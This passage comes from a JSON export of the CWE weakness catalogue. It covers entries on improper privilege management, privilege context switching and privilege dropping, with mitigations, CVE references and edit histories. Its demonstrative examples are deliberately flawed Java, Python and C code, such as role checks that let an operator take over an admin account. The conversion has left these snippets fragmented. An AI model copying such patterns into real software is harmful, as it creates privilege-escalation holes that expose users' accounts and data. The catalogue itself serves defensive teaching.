combination.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"269","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"A user can be given or gain access rights of another user. This can give the user unauthorized access to sensitive information including the access information of another user."}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-49"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource."},{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-128"},"Intro_Text":"This code allows someone with the role of \\"ADMIN\\" or \\"OPERATOR\\" to reset a user\'s password. The role of \\"OPERATOR\\" is intended to have less privileges than an \\"ADMIN\\", but still be able to help users with small issues such as forgotten passwords.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public enum Roles {}public void resetPassword(User requestingUser, User user, String password ){}","xhtml:div":[{"#text":"ADMIN,OPERATOR,USER,GUEST","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(isAuthenticated(requestingUser)){else{}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"switch(requestingUser.role){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case GUEST:case USER:default:}","xhtml:div":[{"#text":"System.out.println(\\"You are not authorized to perform this command\\");break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"System.out.println(\\"You are not authorized to perform this command\\");break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"setPassword(user,password);break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["",""]}}}},{"#text":"System.out.println(\\"You must be logged in to perform this command\\");","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}],"xhtml:br":["",""]}},"Body_Text":"This code does not check the role of the user whose password is being reset. It is possible for an Operator to gain Admin privileges by resetting the password of an Admin account and taking control of that account."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-1736","Description":"Chaining of user rights.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1736"},{"Reference":"CVE-2002-1772","Description":"Gain certain rights via privilege chaining in alternate channel.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1772"},{"Reference":"CVE-2005-1973","Description":"Application is allowed to assign extra permissions to itself.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1973"},{"Reference":"CVE-2003-0640","Description":"\\"operator\\" user can overwrite usernames and passwords to gain admin privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0640"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Privilege Chaining"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-76"}}},"Notes":{"Note":[{"#text":"There is some conceptual overlap with Unsafe Privilege.","attr":{"@_Type":"Relationship"}},{"#text":"It is difficult to find good examples for this weakness.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Other_Notes, Potential_Mitigations, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples"}]}},"269":{"attr":{"@_ID":"269","@_Name":"Improper Privilege Management","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-48"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"Follow the principle of least privilege when assigning access rights to entities in a software system."},{"attr":{"@_Mitigation_ID":"MIT-49"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-126"},"Intro_Text":"This code temporarily raises the program\'s privileges to allow creation of a new user folder.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"def makeNewUserDir(username):","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if invalidUsername(username):try:except OSError:return True","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"print(\'Usernames cannot contain invalid characters\')return False","xhtml:br":["","",""],"xhtml:i":"#avoid CWE-22 and CWE-78"}},{"#text":"raisePrivileges()os.mkdir(\'/home/\' + username)lowerPrivileges()","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"print(\'Unable to create new user directory for user:\' + username)return False","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["","",""]}}}},"Body_Text":"While the program only raises its privilege level to create the folder and immediately lowers it again, if the call to os.mkdir() throws an exception, the call to lowerPrivileges() will not occur. As a result, the program is indefinitely operating in a raised privilege state, possibly allowing further exploitation to occur."},{"attr":{"@_Demonstrative_Example_ID":"DX-97"},"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"seteuid(0);seteuid(getuid());","xhtml:br":["","",""],"xhtml:i":"/* do some stuff */"}}},{"attr":{"@_Demonstrative_Example_ID":"DX-142"},"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"AccessController.doPrivileged(new PrivilegedAction() {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public Object run() {}","xhtml:div":{"#text":"System.loadLibrary(\\"awt\\");return null;","attr":{"@_style":"margin-left:10px;"},"xhtml:i":["// privileged code goes here, for example:","// nothing to return"],"xhtml:br":["","","",""]}}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-127"},"Intro_Text":"This code intends to allow only Administrators to print debug information about a system.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public enum Roles {}public void printDebugInfo(User requestingUser){}","xhtml:div":[{"#text":"ADMIN,USER,GUEST","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(isAuthenticated(requestingUser)){}else{}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"switch(requestingUser.role){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case GUEST:default:","xhtml:div":[{"#text":"System.out.println(\\"You are not authorized to perform this command\\");break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"System.out.println(currentDebugState());break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":""}}}},{"#text":"System.out.println(\\"You must be logged in to perform this command\\");","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}],"xhtml:br":["",""]}},"Body_Text":"While the intention was to only allow Administrators to print the debug information, the code as written only excludes those with the role of \\"GUEST\\". Someone with the role of \\"ADMIN\\" or \\"USER\\" will be allowed access, which goes against the original intent. An attacker may be able to use this debug information to craft an attack on the system."},{"attr":{"@_Demonstrative_Example_ID":"DX-128"},"Intro_Text":"This code allows someone with the role of \\"ADMIN\\" or \\"OPERATOR\\" to reset a user\'s password. The role of \\"OPERATOR\\" is intended to have less privileges than an \\"ADMIN\\", but still be able to help users with small issues such as forgotten passwords.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public enum Roles {}public void resetPassword(User requestingUser, User user, String password ){}","xhtml:div":[{"#text":"ADMIN,OPERATOR,USER,GUEST","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(isAuthenticated(requestingUser)){else{}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"switch(requestingUser.role){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case GUEST:case USER:default:}","xhtml:div":[{"#text":"System.out.println(\\"You are not authorized to perform this command\\");break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"System.out.println(\\"You are not authorized to perform this command\\");break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"setPassword(user,password);break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["",""]}}}},{"#text":"System.out.println(\\"You must be logged in to perform this command\\");","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}],"xhtml:br":["",""]}},"Body_Text":"This code does not check the role of the user whose password is being reset. It is possible for an Operator to gain Admin privileges by resetting the password of an Admin account and taking control of that account."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1555","Description":"Terminal privileges are not reset when a user logs out.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1555"},{"Reference":"CVE-2001-1514","Description":"Does not properly pass security context to child processes in certain cases, allows privilege escalation.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1514"},{"Reference":"CVE-2001-0128","Description":"Does not properly compute roles.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0128"},{"Reference":"CVE-1999-1193","Description":"untrusted user placed in unix \\"wheel\\" group","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1193"},{"Reference":"CVE-2005-2741","Description":"Product allows users to grant themselves certain rights that can be used to escalate privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2741"},{"Reference":"CVE-2005-2496","Description":"Product uses group ID of a user instead of the group, causing it to run with different privileges. This is resultant from some other unknown issue.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2496"},{"Reference":"CVE-2004-0274","Description":"Product mistakenly assigns a particular status to an entity, leading to increased privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0274"},{"Reference":"CVE-2007-4217","Description":"FTP client program on a certain OS runs with setuid privileges and has a buffer overflow. Most clients do not need extra privileges, so an overflow is not a vulnerability for those clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4217"},{"Reference":"CVE-2007-5159","Description":"OS incorrectly installs a program with setuid privileges, allowing users to gain privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5159"},{"Reference":"CVE-2008-4638","Description":"Composite: application running with high privileges (CWE-250) allows user to specify a restricted file to process, which generates a parsing error that leaks the contents of the file (CWE-209).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4638"},{"Reference":"CVE-2007-3931","Description":"Installation script installs some programs as setuid when they shouldn\'t be.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3931"},{"Reference":"CVE-2002-1981","Description":"Roles have access to dangerous procedures (Accessible entities).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1981"},{"Reference":"CVE-2002-1671","Description":"Untrusted object/method gets access to clipboard (Accessible entities).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1671"},{"Reference":"CVE-2000-0315","Description":"Traceroute program allows unprivileged users to modify source address of packet (Accessible entities).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0315"},{"Reference":"CVE-2000-0506","Description":"User with capability can prevent setuid program from dropping privileges (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0506"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Privilege Management Error"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"122"}},{"attr":{"@_CAPEC_ID":"233"}},{"attr":{"@_CAPEC_ID":"58"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 16: Executing Code With Too Much Privilege." Page 243"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, "Dropping Privileges Permanently", Page 479"}}]},"Notes":{"Note":{"#text":"The relationships between privileges, permissions, and actors (e.g. users and groups) need further refinement within the Research view. One complication is that these concepts apply to two different pillars, related to control of resources (CWE-664) and protection mechanism failures (CWE-693).","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"CWE Team","Modification_Date":"2008-09-08","Modification_Comment":"Moved this entry higher up in the Research view."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Maintenance_Notes, Name, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples, Maintenance_Notes, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Privilege Management Error","attr":{"@_Date":"2008-09-09"}},{"#text":"Insecure Privilege Management","attr":{"@_Date":"2009-05-27"}}]}},"270":{"attr":{"@_ID":"270","@_Name":"Privilege Context Switching Error","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly manage privileges while it is switching between different contexts that have different privileges or spheres of control.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"269","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"A user can assume the identity of another user with separate privileges in another context. This will give the user unauthorized access that may allow them to acquire the access information of other users."}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-49"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1688","Description":"Web browser cross domain problem when user hits \\"back\\" button.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1688"},{"Reference":"CVE-2003-1026","Description":"Web browser cross domain problem when user hits \\"back\\" button.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1026"},{"Reference":"CVE-2002-1770","Description":"Cross-domain issue - third party product passes code to web browser, which executes it in unsafe zone.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1770"},{"Reference":"CVE-2005-2263","Description":"Run callback in different security context after it has been changed from untrusted to trusted. * note that \\"context switch before actions are completed\\" is one type of problem that happens frequently, espec. in browsers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2263"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Privilege Context Switching Error"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"17"}},{"attr":{"@_CAPEC_ID":"236"}},{"attr":{"@_CAPEC_ID":"30"}},{"attr":{"@_CAPEC_ID":"35"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 7, "Running with Least Privilege" Page 207"}},{"attr":{"@_External_Reference_ID":"REF-76"}}]},"Notes":{"Note":{"#text":"This concept needs more study.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"271":{"attr":{"@_ID":"271","@_Name":"Privilege Dropping / Lowering Errors","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not drop privileges before passing control of a resource to an actor that does not have those privileges.","Extended_Description":"In some contexts, a system executing with elevated permissions will hand off a process/file/etc. to another process or user. If the privileges of an entity are not reduced, then elevated privileges are spread throughout a system and possibly to an attacker.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"269","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"If privileges are not dropped, neither are access rights of the user. Often these rights can be prevented from being dropped."},{"Scope":["Access Control","Non-Repudiation"],"Impact":["Gain Privileges or Assume Identity","Hide Activities"],"Note":"If privileges are not dropped, in some cases the system may record actions as the user which is being impersonated rather than the impersonator."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}},{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-49"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-98"},"Intro_Text":"The following code calls chroot() to restrict the application to a subset of the filesystem below APP_HOME in order to prevent an attacker from using the program to gain unauthorized access to files located elsewhere. The code then opens a file specified by the user and processes the contents of the file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"chroot(APP_HOME);chdir(\\"/\\");FILE* data = fopen(argv[1], \\"r+\\");...","xhtml:br":["","",""]}},"Body_Text":"Constraining the process inside the application\'s home directory before opening any files is a valuable security measure. However, the absence of a call to setuid() with some non-zero value means the application is continuing to operate with unnecessary root privileges. Any successful exploit carried out by an attacker against the application can now result in a privilege escalation attack because any malicious operations will be performed with the privileges of the superuser. If the application drops to the privilege level of a non-root user, the potential for damage is substantially reduced."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-1213","Description":"Program does not drop privileges after acquiring the raw socket.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1213"},{"Reference":"CVE-2001-0559","Description":"Setuid program does not drop privileges after a parsing error occurs, then calls another program to handle the error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0559"},{"Reference":"CVE-2001-0787","Description":"Does not drop privileges in related groups when lowering privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0787"},{"Reference":"CVE-2002-0080","Description":"Does not drop privileges in related groups when lowering privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0080"},{"Reference":"CVE-2001-1029","Description":"Does not drop privileges before determining access to certain files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1029"},{"Reference":"CVE-1999-0813","Description":"Finger daemon does not drop privileges when executing programs on behalf of the user being fingered.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0813"},{"Reference":"CVE-1999-1326","Description":"FTP server does not drop privileges if a connection is aborted during file transfer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1326"},{"Reference":"CVE-2000-0172","Description":"Program only uses seteuid to drop privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0172"},{"Reference":"CVE-2004-2504","Description":"Windows program running as SYSTEM does not drop privileges before executing other programs (many others like this, especially involving the Help facility).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2504"},{"Reference":"CVE-2004-0213","Description":"Utility Manager launches winhlp32.exe while running with raised privileges, which allows local users to gain system privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0213"},{"Reference":"CVE-2004-0806","Description":"Setuid program does not drop privileges before executing program specified in an environment variable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0806"},{"Reference":"CVE-2004-0828","Description":"Setuid program does not drop privileges before processing file specified on command line.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0828"},{"Reference":"CVE-2004-2070","Description":"Service on Windows does not drop privileges before using \\"view file\\" option, allowing code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2070"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Privilege Dropping / Lowering Errors"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 16: Executing Code With Too Much Privilege." Page 243"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, "Dropping Privileges Permanently", Page 479"}}]},"Notes":{"Note":{"#text":"CWE-271, CWE-272, and CWE-250 are all closely related and possibly overlapping. CWE-271 is probably better suited as a 